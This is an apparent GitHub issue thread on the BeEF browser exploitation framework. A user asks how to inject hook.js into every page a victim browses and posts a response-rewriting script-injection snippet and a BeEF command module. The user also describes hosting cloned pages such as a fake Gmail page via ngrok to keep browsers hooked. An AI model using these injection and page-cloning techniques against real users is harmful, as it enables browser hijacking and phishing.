### ISSUE TITLE
Is it possible to inject hook.js to all webpages the user will browse to?

### ISSUE THREAD

**Issue by digilevi2006** [beefproject/beef#1969]
Dear Everyone,

Is there anyway Beef can infect all webpages the user browses? using this:

```
function onLoad() {
  console.log("BeefInject loaded.");
  console.log("targets: ");
}

function onResponse(req, res) {
  if (res.ContentType.indexOf('text/html') == 0 ){
     var body = res.ReadBody();
     if( body.indexOf('</head>') != -1 ) {
         res.Body = body.replace(
             '</head>',
             '<script type="text/javascript" src=""></script></head>'
);
}      
}
}
```
`https://www.youtube.com/watch?v=wcNuFFpyXXw`

without using Bettercap...

2. Also, can I do this in the alertdialog's command.js? But this one needs to go to another page first, by browser redirect or something.

```
beef.execute(function() {
	alert("<%= @text %>");
	/*
	function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    await sleep(15000);
    var button1 = document.getElementsByClassName("element 1");
    var button2= document.getElementsByClassName("element 2");
    var button3= document.getElementsByClassName("element 3");
    button1[1].click();
    button2[1].click();
    await sleep(1000);
    button3[1].click();
    */
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%= @text %>", beef.are.status_success());
});
```

Lastly, can I load only modules that I want to use? remove other folders from the ui panel?

**Comment by bcoles** [comment]
> Is there anyway Beef can infect all webpages the user browses?

Not easily. There are a few techniques to do this so long as the request is to the same origin, such as man-in-the-browser, but no longer work.

> Also, can I do this in the alertdialog's command.js?

It looks like valid JavaScript, so , yes, you can do that. The `command.js` files are JavaScript. You can put JavaScript in them. I have no idea what you're trying to achieve. Almost all of the code is commented out.

> Lastly, can I load only modules that I want to use? remove other folders from the ui panel?

Delete the modules from the `modules` directory on the filesystem.

**Comment by digilevi2006** [comment]
Hi @bcoles 

Sorry, it's me again...

Is there anyway, I can communicate with you in private? like messenger or something? If you will say impossible then I'll stop what I'm trying to achieve.

**Comment by bcoles** [comment]
This might be useful:

* https://en.wikipedia.org/wiki/Same-origin_policy

**Comment by digilevi2006** [comment]
Hi @bcoles 

Thanks for the link

if I will do this

https://abcdefg.ngrok.io/beef.html    then redirect to 
https://abcdefg.ngrok.io/gmail.html    and will retain the hook?

if so, should i redirect like this /gmail.html or the full url, https://abcdefg.ngrok.io/gmail.html? 

The user can just click an href actually. and it will have "target = _blank", so will be working things on the original/hooked tab.

speaking of href, on the wiki, it says, html tags are bypassed from this origin check? so, all html tags?


Also, last time I tried to save the full a real webpage into file.html and tried to run it directly as a file, it didn't work. So, you think it will work if it fires up from ngrok server?

Sorry, I'm still re installing kali on virtualbox and can't wait for you answer.

**Comment by bcoles** [comment]
> if I will do this
> 
> https://abcdefg.ngrok.io/beef.html then redirect to
> https://abcdefg.ngrok.io/gmail.html and will retain the hook?

If `gmail.html` contains the BeEF hook then it will hook.

> speaking of href, on the wiki, it says, html tags are bypassed from this origin check? so, all html tags?

I don't know what that means.

> Also, last time I tried to save the full a real webpage into file.html and tried to run it directly as a file, it didn't work. So, you think it will work if it fires up from ngrok server?

I don't know what that means.

**Comment by digilevi2006** [comment]
> > Also, last time I tried to save the full a real webpage into file.html and tried to run it directly as a file, it didn't work. So, you think it will work if it fires up from ngrok server?
> 
> I don't know what that means.

I wanted to redirect the hooked tab into a different webpage like gmail.com, but it will not retain the hook? So, I tried the  iFrame version of it, but it seems it doesn't work. I tried youtube.com and google.com but it says iFrame not allowed. The Redirect Rickroll has and embed youtube though, but in full screen and no buttons to click.

So, I was thinking that if I save a webpage as an html file, and double click it, it will pull up the real webpage from google or the real server. But when I opened the html file on it's own, it was just blank page. Not sure if I run it through apache2 of kali or ngrok, it will work.

I've seen the Social Engineering google phishing page html of beef and it has some real links going to the real servers. But not sure how to reproduce that thing(yet) and apply to the webpage I'm trying to click elements on. :)
